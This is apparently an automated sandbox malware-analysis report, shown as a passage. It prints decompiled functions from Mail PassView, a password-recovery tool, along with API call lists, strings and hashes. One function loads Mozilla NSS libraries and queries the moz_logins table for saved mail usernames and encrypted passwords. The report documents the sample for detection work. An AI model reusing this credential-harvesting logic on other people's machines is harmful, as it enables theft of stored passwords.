									_t85 = GetDlgItem( *(__ecx + 4), 0x3ec);
									_push(_v12.y);
									_a8 = _t85;
									if(ChildWindowFromPoint( *(_t113 + 4), _t96) != _a8) {
										__eflags =  *0x417388;
										if( *0x417388 == 0) {
											goto L29;
										} else {
											_t87 = GetDlgItem( *(_t113 + 4), 0x3ee);
											_push(_v12.y);
											_t88 = ChildWindowFromPoint( *(_t113 + 4), _v12);
											__eflags = _t88 - _t87;
											if(_t88 != _t87) {
												goto L29;
											} else {
												_push(0x417388);
												goto L7;
											}
										}
									} else {
										_push(_t113 + 0x10b);
										L7:
										_push( *(_t113 + 4));
										E00406523();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}

0x004010e5
0x004010e8
0x004010e9
0x004010ed
0x004010f5
0x004010f7
0x004012b2
0x004012b9
0x004012f4
0x004012bb
0x004012d4
0x004012e3
0x004012e3
0x00401302
0x0040131a
0x0040132b
0x0040132d
0x00401335
0x00000000
0x004010fd
0x004010fd
0x004010fe
0x0040127d
0x00401280
0x00401284
0x00000000
0x0040128a
0x0040128d
0x00401290
0x00000000
0x00401296
0x0040129b
0x004012a7
0x00000000
0x004012a7
0x00401290
0x00401104
0x00401104
0x00401107
0x0040122e
0x00401230
0x00401233
0x0040125b
0x00401262
0x00000000
0x00401268
0x00401270
0x00401272
0x00401275
0x00000000
0x0040127b
0x00000000
0x0040127b
0x00401275
0x00401235
0x00401235
0x0040123a
0x00401248
0x00401250
0x00401250
0x0040110d
0x0040110d
0x00401112
0x004011a2
0x004011ab
0x004011b9
0x004011bc
0x004011bf
0x004011c1
0x004011c4
0x004011d1
0x004011d3
0x004011d6
0x004011f2
0x004011f9
0x00000000
0x004011ff
0x00401207
0x00401209
0x00401214
0x00401216
0x00401218
0x00000000
0x0040121e
0x00000000
0x0040121e
0x00401218
0x004011d8
0x004011d8
0x004011e7
0x00000000
0x004011e7
0x00401118
0x0040111a
0x0040133b
0x0040133b
0x0040133b
0x00401120
0x00401120
0x00401129
0x00401137
0x0040113a
0x0040113d
0x0040113f
0x00401142
0x00401154
0x0040116f
0x00401176
0x00000000
0x0040117c
0x00401184
0x00401186
0x00401191
0x00401193
0x00401195
0x00000000
0x0040119b
0x0040119b
0x00000000
0x0040119b
0x00401195
0x00401156
0x0040115c
0x0040115d
0x0040115d
0x00401160
0x00401167
0x00401169
0x00401169
0x00401154
0x0040111a
0x00401112
0x00401107
0x004010fe
0x00401341

APIs

GetDlgItem.USER32 ref: 0040113D
ChildWindowFromPoint.USER32 ref: 0040114F
GetDlgItem.USER32 ref: 00401184
ChildWindowFromPoint.USER32 ref: 00401191
GetDlgItem.USER32 ref: 004011BF
ChildWindowFromPoint.USER32 ref: 004011D1
LoadCursorA.USER32 ref: 004011E0
SetCursor.USER32(00000000,?,?), ref: 004011E7
GetDlgItem.USER32 ref: 00401207
ChildWindowFromPoint.USER32 ref: 00401214
GetDlgItem.USER32 ref: 0040122E
SetBkMode.GDI32(?,00000001), ref: 0040123A
SetTextColor.GDI32(?,00C00000), ref: 00401248
GetSysColorBrush.USER32(0000000F), ref: 00401250
GetDlgItem.USER32 ref: 00401270
EndDialog.USER32(?,00000001), ref: 0040129B
DeleteObject.GDI32(?), ref: 004012A7
GetDlgItem.USER32 ref: 004012CB
ShowWindow.USER32(00000000), ref: 004012D4
GetDlgItem.USER32 ref: 004012E0
ShowWindow.USER32(00000000), ref: 004012E3
SetDlgItemTextA.USER32 ref: 004012F4
SetWindowTextA.USER32(?,Mail PassView), ref: 00401302
SetDlgItemTextA.USER32 ref: 0040131A
SetDlgItemTextA.USER32 ref: 0040132B

Strings

Mail PassView, xrefs: 004012FA

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObject
String ID: Mail PassView
API String ID: 3628558512-272225179
Opcode ID: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
Instruction ID: a5e01e197ecdabf9e6bdb75eaf1794657044b10619e6b9182d208ef804a260cb
Opcode Fuzzy Hash: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
Instruction Fuzzy Hash: 68518130044248BFEB259F60DE85EAE7BB5EB04700F10853AFA56E65F0C7759D61EB08

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE28, Relevance: 42.3, APIs: 21, Strings: 3, Instructions: 311
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040CE28(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
				char* _v8;
				int _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				int* _v28;
				char* _v32;
				int _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				void _v331;
				int _v332;
				void _v587;
				int _v588;
				void _v851;
				char _v852;
				void _v1378;
				short _v1380;
				void _v1995;
				char _v1996;
				void _v2611;
				char _v2612;
				char _v3636;
				char _v4660;
				char _v5684;
				char _v6708;
				char _v7732;
				void _v8755;
				char _v8756;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t115;
				signed int _t116;
				int _t118;
				void* _t130;
				char* _t170;
				intOrPtr _t175;
				char* _t177;
				int _t196;
				intOrPtr _t226;
				void* _t229;
				int* _t232;
				char* _t235;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;

				E004118A0(0x2234, __ecx);
				_t226 = _a4;
				_t232 = _t226 + 0x30;
				_v28 = _t232;
				_t115 = E0040DEEE(_t232, _t226 + 0x362);
				if(_t115 == 0) {
					L43:
					return _t115;
				}
				_t116 = _t232[1];
				_t196 = 0;
				if(_t116 == 0) {
					_t115 = _t116 | 0xffffffff;
				} else {
					_t115 =  *_t116(_t226 + 0x158);
				}
				if(_t115 != _t196) {
					L41:
					if( *_t232 == _t196) {
						goto L43;
					}
					_t118 = SetCurrentDirectoryA( &(_t232[8]));
					 *_t232 = _t196;
					return _t118;
				} else {
					_v36 = _t196;
					if(E0040F64B( &_v72, _t226 + 0x362) == 0) {
						L39:
						_t232 = _v28;
						_t115 = _t232[2];
						if(_t115 != _t196) {
							_t115 =  *_t115();
						}
						goto L41;
					} else {
						_v12 = _t196;
						_v1380 = _t196;
						memset( &_v1378, _t196, 0x208);
						_v852 = _t196;
						memset( &_v851, _t196, 0x104);
						_t239 = _t238 + 0x18;
						MultiByteToWideChar(_t196, _t196, _a8, 0xffffffff,  &_v1380, 0x104);
						WideCharToMultiByte(0xfde9, _t196,  &_v1380, 0xffffffff,  &_v852, 0x104, _t196, _t196);
						if(_v72 != _t196) {
							_v72( &_v852,  &_v12);
						}
						if(_v12 == _t196) {
							goto L39;
						}
						_a8 = _t196;
						if(_v68 != _t196) {
							_v68(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v76);
							_t239 = _t239 + 0x14;
						}
						L11:
						L11:
						if(_v64 == _t196) {
							_t130 = 0xffff;
						} else {
							_t130 = _v64(_a8);
						}
						if(_t130 != 0x64) {
							goto L34;
						}
						_v8756 = _t196;
						memset( &_v8755, _t196, 0x3ff);
						memset( &_v7732, _t196, 0x1400);
						_t240 = _t239 + 0x18;
						_t235 = E0040F7EE( &_v72, _a8, 1);
						_v20 = E0040F7EE( &_v72, _a8, 6);
						_v8 = E0040F7EE( &_v72, _a8, 7);
						_v24 = E0040F7EE( &_v72, _a8, 4);
						_v32 = E0040F7EE( &_v72, _a8, 5);
						_v16 = E0040F7EE( &_v72, _a8, 2);
						if(_t235 != _t196) {
							strcpy( &_v8756, _t235);
						}
						if(_v20 != _t196) {
							strcpy( &_v7732, _v20);
						}
						if(_v8 != _t196) {
							strcpy( &_v6708, _v8);
						}
						if(_v24 != _t196) {
							strcpy( &_v5684, _v24);
						}
						if(_v32 != _t196) {
							strcpy( &_v4660, _v32);
						}
						if(_v16 != _t196) {
							strcpy( &_v3636, _v16);
						}
						_v332 = _t196;
						memset( &_v331, _t196, 0xff);
						_v588 = _t196;
						memset( &_v587, _t196, 0xff);
						_t239 = _t240 + 0x18;
						E0040CD27(_v8, _t226,  &_v588);
						E0040CD27(_v20, _t226,  &_v332);
						_v8 = _t196;
						if( *((intOrPtr*)(_t226 + 0x474)) > _t196) {
							_v16 = _t226 + 0x468;
							do {
								_t237 = E0040D438(_v8, _v16);
								_v2612 = _t196;
								memset( &_v2611, _t196, 0x261);
								_v1996 = _t196;
								memset( &_v1995, _t196, 0x261);
								_t86 = _t237 + 0x104; // 0x104
								_t229 = _t86;
								sprintf( &_v2612, "mailbox://%s", _t229);
								sprintf( &_v1996, "imap://%s", _t229);
								_push( &_v3636);
								_t170 =  &_v2612;
								_push(_t170);
								L004115B2();
								_t239 = _t239 + 0x38;
								if(_t170 == 0) {
									L31:
									_t94 = _t237 + 0x304; // 0x304
									E004060D0(0xff, _t94,  &_v588);
									_t96 = _t237 + 0x204; // 0x204
									E004060D0(0xff, _t96,  &_v332);
									_t196 = 0;
									goto L32;
								}
								_push( &_v3636);
								_t177 =  &_v1996;
								_push(_t177);
								L004115B2();
								if(_t177 != 0) {
									goto L32;
								}
								goto L31;
								L32:
								_v8 =  &(_v8[1]);
								_t175 = _a4;
							} while (_v8 <  *((intOrPtr*)(_t175 + 0x474)));
							_t226 = _t175;
						}
						goto L11;
						L34:
						if(_a8 != _t196 && _v48 != _t196) {
							_v48(_a8);
						}
						if(_v44 != _t196) {
							_v44(_v12);
						}
						goto L39;
					}
				}
			}

0x0040ce30
0x0040ce38
0x0040ce41
0x0040ce45
0x0040ce48
0x0040ce4f
0x0040d1e9
0x0040d1e9
0x0040d1e9
0x0040ce55
0x0040ce58
0x0040ce5c
0x0040ce6a
0x0040ce5e
0x0040ce65
0x0040ce67
0x0040ce6f
0x0040d1d5
0x0040d1d7
0x00000000
0x00000000
0x0040d1dd
0x0040d1e3
0x00000000
0x0040ce75
0x0040ce7f
0x0040ce89
0x0040d1c9
0x0040d1c9
0x0040d1cc
0x0040d1d1
0x0040d1d3
0x0040d1d3
0x00000000
0x0040ce8f
0x0040ce9c
0x0040ce9f
0x0040cea6
0x0040ceb9
0x0040cebf
0x0040cec4
0x0040ced6
0x0040cef5
0x0040cefe
0x0040cf0b
0x0040cf0f
0x0040cf13
0x00000000
0x00000000
0x0040cf1c
0x0040cf1f
0x0040cf33
0x0040cf36
0x0040cf36
0x00000000
0x0040cf39
0x0040cf3c
0x0040cf47
0x0040cf3e
0x0040cf41
0x0040cf44
0x0040cf4f
0x00000000
0x00000000
0x0040cf62
0x0040cf68
0x0040cf7a
0x0040cf7f
0x0040cf94
0x0040cfa3
0x0040cfb3
0x0040cfc3
0x0040cfd3
0x0040cfe0
0x0040cfe3
0x0040cfed
0x0040cff3
0x0040cff7
0x0040d003
0x0040d009
0x0040d00d
0x0040d019
0x0040d01f
0x0040d023
0x0040d02f
0x0040d035
0x0040d039
0x0040d045
0x0040d04b
0x0040d04f
0x0040d05b
0x0040d061
0x0040d070
0x0040d076
0x0040d084
0x0040d08a
0x0040d08f
0x0040d09e
0x0040d0af
0x0040d0ba
0x0040d0bd
0x0040d0c9
0x0040d0cc
0x0040d0dd
0x0040d0e7
0x0040d0ed
0x0040d0fb
0x0040d101
0x0040d106
0x0040d106
0x0040d119
0x0040d12b
0x0040d136
0x0040d137
0x0040d13d
0x0040d13e
0x0040d143
0x0040d148
0x0040d163
0x0040d16a
0x0040d175
0x0040d181
0x0040d187
0x0040d18e
0x00000000
0x0040d18e
0x0040d150
0x0040d151
0x0040d157
0x0040d158
0x0040d161
0x00000000
0x00000000
0x00000000
0x0040d190
0x0040d190
0x0040d193
0x0040d199
0x0040d1a5
0x0040d1a5
0x00000000
0x0040d1ac
0x0040d1af
0x0040d1b9
0x0040d1bc
0x0040d1c0
0x0040d1c5
0x0040d1c8
0x00000000
0x0040d1c0
0x0040ce89

APIs

Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF0F
Part of subcall function 0040DEEE: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
Part of subcall function 0040DEEE: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF62
Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF6C
Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF7A
Part of subcall function 0040DEEE: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038

memset.MSVCRT ref: 0040CEA6
memset.MSVCRT ref: 0040CEBF
MultiByteToWideChar.KERNEL32(00000000,00000000,0040D314,000000FF,?,00000104,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CED6
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CEF5
memset.MSVCRT ref: 0040CF68
memset.MSVCRT ref: 0040CF7A
strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040CFED
strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D003
strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D019
strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D02F
strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D045
strcpy.MSVCRT(?,0040D314,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D05B
memset.MSVCRT ref: 0040D076
memset.MSVCRT ref: 0040D08A
memset.MSVCRT ref: 0040D0ED
memset.MSVCRT ref: 0040D101
sprintf.MSVCRT ref: 0040D119
sprintf.MSVCRT ref: 0040D12B
_stricmp.MSVCRT(?,?,?,imap://%s,00000104,?,mailbox://%s,00000104,?,00000000,00000261,?,00000000,00000261,?,?), ref: 0040D13E
_stricmp.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040D158
SetCurrentDirectoryA.KERNEL32(?,?,?,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040D1DD

Strings

imap://%s, xrefs: 0040D125
SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040CF2B
mailbox://%s, xrefs: 0040D113

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$AddressProcstrcpy$CurrentDirectory$ByteCharLibraryLoadMultiWide_stricmpsprintfstrlen$HandleModule
String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s
API String ID: 4276617627-3913509535
Opcode ID: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
Instruction ID: 531ad7aca3640aed267cd003a13377454315b37e4b42da830508d09ae9ff7478
Opcode Fuzzy Hash: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
Instruction Fuzzy Hash: 58B10A72C00219ABDB20EFA5CC819DEB7BDEF04315F1445BBE619B2191DB38AB858F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040A774, Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 285
windowregistrystringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040A774(intOrPtr __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HMENU__* _t121;
				struct HWND__* _t122;
				intOrPtr _t128;
				int _t133;
				intOrPtr _t135;
				int _t149;
				void* _t166;
				void* _t174;
				void* _t178;
				void* _t185;
				intOrPtr _t194;
				void* _t197;
				void* _t198;
				intOrPtr _t200;
				intOrPtr _t201;
				void* _t202;
				int _t204;
				intOrPtr _t205;
				intOrPtr* _t207;
				intOrPtr* _t208;
				void* _t210;
				intOrPtr* _t211;
				void* _t213;

				_t213 = __eflags;
				_t208 = _t210 - 0x78;
				_t211 = _t210 - 0xb8;
				 *((intOrPtr*)(_t208 + 0x70)) = __ecx;
				 *((char*)(_t208 - 0x37)) = 1;
				 *(_t208 - 0x40) = 0;
				 *((intOrPtr*)(_t208 - 0x3c)) = 0;
				 *((char*)(_t208 - 0x38)) = 0;
				 *((char*)(_t208 - 0x36)) = 0;
				 *((char*)(_t208 - 0x35)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 0x2c) = 1;
				 *((intOrPtr*)(_t208 - 0x28)) = 0x9c41;
				 *((char*)(_t208 - 0x24)) = 4;
				 *((char*)(_t208 - 0x23)) = 0;
				 *((char*)(_t208 - 0x22)) = 0;
				 *((char*)(_t208 - 0x21)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 - 0x18)) = 5;
				 *((intOrPtr*)(_t208 - 0x14)) = 0x9c44;
				 *((char*)(_t208 - 0x10)) = 4;
				 *((char*)(_t208 - 0xf)) = 0;
				 *((char*)(_t208 - 0xe)) = 0;
				 *((char*)(_t208 - 0xd)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 4) = 2;
				 *_t208 = 0x9c48;
				 *((char*)(_t208 + 4)) = 4;
				 *((char*)(_t208 + 5)) = 0;
				 *((char*)(_t208 + 6)) = 0;
				 *((char*)(_t208 + 7)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x10)) = 3;
				 *((intOrPtr*)(_t208 + 0x14)) = 0x9c49;
				 *((char*)(_t208 + 0x18)) = 4;
				 *((char*)(_t208 + 0x19)) = 0;
				 *((char*)(_t208 + 0x1a)) = 0;
				 *((char*)(_t208 + 0x1b)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x24)) = 0;
				 *((intOrPtr*)(_t208 + 0x28)) = 0x9c4e;
				 *((char*)(_t208 + 0x2c)) = 4;
				 *((char*)(_t208 + 0x2d)) = 0;
				 *((char*)(_t208 + 0x2e)) = 0;
				 *((char*)(_t208 + 0x2f)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x38)) = 6;
				 *((intOrPtr*)(_t208 + 0x3c)) = 0x9c56;
				 *((char*)(_t208 + 0x40)) = 4;
				 *((char*)(_t208 + 0x41)) = 0;
				 *((char*)(_t208 + 0x42)) = 0;
				 *((char*)(_t208 + 0x43)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x4c)) = 4;
				 *((intOrPtr*)(_t208 + 0x50)) = 0x9c42;
				 *((char*)(_t208 + 0x54)) = 4;
				 *((char*)(_t208 + 0x55)) = 0;
				 *((char*)(_t208 + 0x56)) = 0;
				 *((char*)(_t208 + 0x57)) = 0;
				 *(_t208 + 0x6c) =  *(_t208 + 0x6c) | 0xffffffff;
				asm("stosd");
				_t198 = 0x66;
				asm("stosd");
				_t121 = E00407BB9(_t198);
				_t194 =  *((intOrPtr*)(_t208 + 0x70));
				 *(_t194 + 0x11c) = _t121;
				_t122 = SetMenu( *(_t194 + 0x108), _t121);
				__imp__#6(0x50000000, 0x412466,  *(_t194 + 0x108), 0x101, _t185, _t197, _t166);
				 *(_t194 + 0x114) = _t122;
				SendMessageA(_t122, 0x404, 1, _t208 + 0x6c);
				 *((intOrPtr*)(_t194 + 0x118)) = CreateToolbarEx( *(_t194 + 0x108), 0x50010900, 0x102, 7, 0, LoadImageA( *0x416b94, 0x68, 0, 0, 0, 0x9060), _t208 - 0x40, 8, 0x10, 0x10, 0x70, 0x10, 0x14);
				E004023D4( *((intOrPtr*)(_t194 + 0x370)), _t213, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t194 + 0x108), 0x103,  *0x416b94, 0), 1);
				_t128 =  *((intOrPtr*)(_t194 + 0x370));
				_t173 =  *((intOrPtr*)(_t128 + 0x1b0));
				_t200 =  *((intOrPtr*)(_t128 + 0x1b4));
				 *((intOrPtr*)(_t208 + 0x68)) =  *((intOrPtr*)(_t128 + 0x184));
				if(_t173 <= 0) {
					L3:
					_t201 =  *((intOrPtr*)(_t194 + 0x370));
					E00409EC4(_t201);
					_t133 = ImageList_ReplaceIcon( *(_t201 + 0x18c), 0, LoadIconA( *0x416b94, 0x66));
					if( *((intOrPtr*)(_t201 + 0x1b8)) != 0) {
						E00409E32(_t133, _t173, _t194, _t201);
					}
					_t202 = 0x68;
					 *((intOrPtr*)(_t194 + 0x154)) = E00407BB9(_t202);
					_t135 =  *((intOrPtr*)(_t194 + 0x37c));
					if( *((intOrPtr*)(_t135 + 0x30)) <= 0) {
						_t174 = 0x412466;
					} else {
						if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
							_t174 = 0;
						} else {
							_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0xc)))) +  *((intOrPtr*)(_t135 + 0x10));
						}
					}
					_push("/noloadsettings");
					_push(_t174);
					L004115B2();
					if(_t135 == 0) {
						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
					}
					E0040AF17(_t194, 0);
					 *( *(_t194 + 0x36c)) = 1;
					SetFocus( *( *((intOrPtr*)(_t194 + 0x370)) + 0x184));
					if( *0x417660 == 0) {
						E00406172(0x417660);
						if((GetFileAttributesA(0x417660) & 0x00000001) != 0) {
							GetTempPathA(0x104, 0x417660);
						}
					}
					_t204 = strlen(0x417660);
					 *_t211 = "report.html";
					_t99 = strlen(??) + 1; // 0x1
					_t223 = _t204 + _t99 - 0x104;
					if(_t204 + _t99 >= 0x104) {
						 *((char*)(_t194 + 0x264)) = 0;
					} else {
						E004062AD(_t194 + 0x264, 0x417660, "report.html");
					}
					_push(1);
					_t178 = 0x30;
					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), _t178);
					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), 1, ( *(_t194 + 0x36c))[1]);
					_t149 = RegisterWindowMessageA("commdlg_FindReplace");
					_t205 = _t194;
					 *(_t194 + 0x374) = _t149;
					E0040A27F(0, 1, _t205, _t223);
					E00401E8B(_t223,  *((intOrPtr*)(_t205 + 0x370)) + 0xb20);
					 *(_t208 + 0x60) = 0x12c;
					 *((intOrPtr*)(_t208 + 0x64)) = 0x400;
					SendMessageA( *(_t205 + 0x114), 0x404, 2, _t208 + 0x60);
					return SendMessageA( *(_t205 + 0x114), 0x401, 0x1001, 0);
				} else {
					_t207 = _t200 + 0xc;
					 *((intOrPtr*)(_t208 + 0x74)) = _t173;
					do {
						_t173 =  *((intOrPtr*)(_t207 - 8));
						E00404925( *((intOrPtr*)(_t207 + 4)),  *((intOrPtr*)(_t207 - 8)),  *((intOrPtr*)(_t208 + 0x68)),  *((intOrPtr*)(_t207 - 0xc)),  *((intOrPtr*)(_t207 - 4)),  *_t207);
						_t211 = _t211 + 0x10;
						_t207 = _t207 + 0x14;
						_t82 = _t208 + 0x74;
						 *_t82 =  *((intOrPtr*)(_t208 + 0x74)) - 1;
					} while ( *_t82 != 0);
					goto L3;
				}
			}

0x0040a774
0x0040a775
0x0040a779
0x0040a782
0x0040a785
0x0040a78d
0x0040a790
0x0040a793
0x0040a796
0x0040a799
0x0040a79f
0x0040a7a0
0x0040a7a1
0x0040a7a8
0x0040a7af
0x0040a7b3
0x0040a7b6
0x0040a7b9
0x0040a7c1
0x0040a7c2
0x0040a7c3
0x0040a7ca
0x0040a7d1
0x0040a7d5
0x0040a7d8
0x0040a7db
0x0040a7e3
0x0040a7e4
0x0040a7e5
0x0040a7ec
0x0040a7f3
0x0040a7f7
0x0040a7fa
0x0040a7fd
0x0040a805
0x0040a806
0x0040a807
0x0040a80e
0x0040a815
0x0040a819
0x0040a81c
0x0040a81f
0x0040a827
0x0040a828
0x0040a829
0x0040a82c
0x0040a833
0x0040a837
0x0040a83a
0x0040a83d
0x0040a845
0x0040a846
0x0040a847
0x0040a84e
0x0040a855
0x0040a859
0x0040a85c
0x0040a85f
0x0040a867
0x0040a868
0x0040a869
0x0040a870
0x0040a877
0x0040a87b
0x0040a87e
0x0040a881
0x0040a884
0x0040a88d
0x0040a890
0x0040a891
0x0040a892
0x0040a897
0x0040a8a1
0x0040a8a7
0x0040a8c2
0x0040a8d4
0x0040a8da
0x0040a927
0x0040a95f
0x0040a964
0x0040a96a
0x0040a972
0x0040a97e
0x0040a981
0x0040a9aa
0x0040a9aa
0x0040a9b2
0x0040a9cd
0x0040a9d9
0x0040a9db
0x0040a9db
0x0040a9e2
0x0040a9e8
0x0040a9ee
0x0040a9f7
0x0040aa0c
0x0040a9f9
0x0040a9fc
0x0040aa08
0x0040a9fe
0x0040aa03
0x0040aa03
0x0040a9fc
0x0040aa11
0x0040aa16
0x0040aa17
0x0040aa20
0x0040aa2c
0x0040aa2c
0x0040aa35
0x0040aa40
0x0040aa52
0x0040aa63
0x0040aa65
0x0040aa73
0x0040aa7b
0x0040aa7b
0x0040aa73
0x0040aa87
0x0040aa89
0x0040aa95
0x0040aa99
0x0040aa9f
0x0040aaba
0x0040aaa1
0x0040aab1
0x0040aab7
0x0040aac6
0x0040aaca
0x0040aacb
0x0040aae2
0x0040aaec
0x0040aaf4
0x0040aaf6
0x0040aafc
0x0040ab0d
0x0040ab29
0x0040ab30
0x0040ab37
0x0040ab53
0x0040a983
0x0040a983
0x0040a986
0x0040a989
0x0040a991
0x0040a99a
0x0040a99f
0x0040a9a2
0x0040a9a5
0x0040a9a5
0x0040a9a5
0x00000000
0x0040a989

APIs

Part of subcall function 00407BB9: LoadMenuA.USER32 ref: 00407BC1
Part of subcall function 00407BB9: sprintf.MSVCRT ref: 00407BE4

SetMenu.USER32(?,00000000), ref: 0040A8A7
#6.COMCTL32(50000000,Function_00012466,?,00000101), ref: 0040A8C2
SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040A8DA
LoadImageA.USER32 ref: 0040A8F0
CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040A91A
CreateWindowExA.USER32 ref: 0040A950
LoadIconA.USER32 ref: 0040A9BF
ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9CD
_stricmp.MSVCRT(Function_00012466,/noloadsettings), ref: 0040AA17
RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MailPassView), ref: 0040AA2C
SetFocus.USER32(?,00000000), ref: 0040AA52
GetFileAttributesA.KERNEL32(00417660), ref: 0040AA6B
GetTempPathA.KERNEL32(00000104,00417660), ref: 0040AA7B
strlen.MSVCRT ref: 0040AA82
strlen.MSVCRT ref: 0040AA90
RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AAEC

Part of subcall function 00404925: strlen.MSVCRT ref: 00404942
Part of subcall function 00404925: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404966

SendMessageA.USER32(?,00000404,00000002,?), ref: 0040AB37
SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040AB4A

Strings

report.html, xrefs: 0040AA89, 0040AAA1
commdlg_FindReplace, xrefs: 0040AAE7
/noloadsettings, xrefs: 0040AA11
`vA, xrefs: 0040AA5E
Software\NirSoft\MailPassView, xrefs: 0040AA22
SysListView32, xrefs: 0040A94A

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Message$Send$Loadstrlen$CreateIconImageMenuWindow$AttributesDeleteFileFocusList_PathRegisterReplaceTempToolbar_stricmpsprintf
String ID: /noloadsettings$Software\NirSoft\MailPassView$SysListView32$`vA$commdlg_FindReplace$report.html
API String ID: 873469642-860065374
Opcode ID: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
Instruction ID: ca2bded9840d9beafebaacef77bacb5142d556b3fd29cdc4ce09694084a06bb6
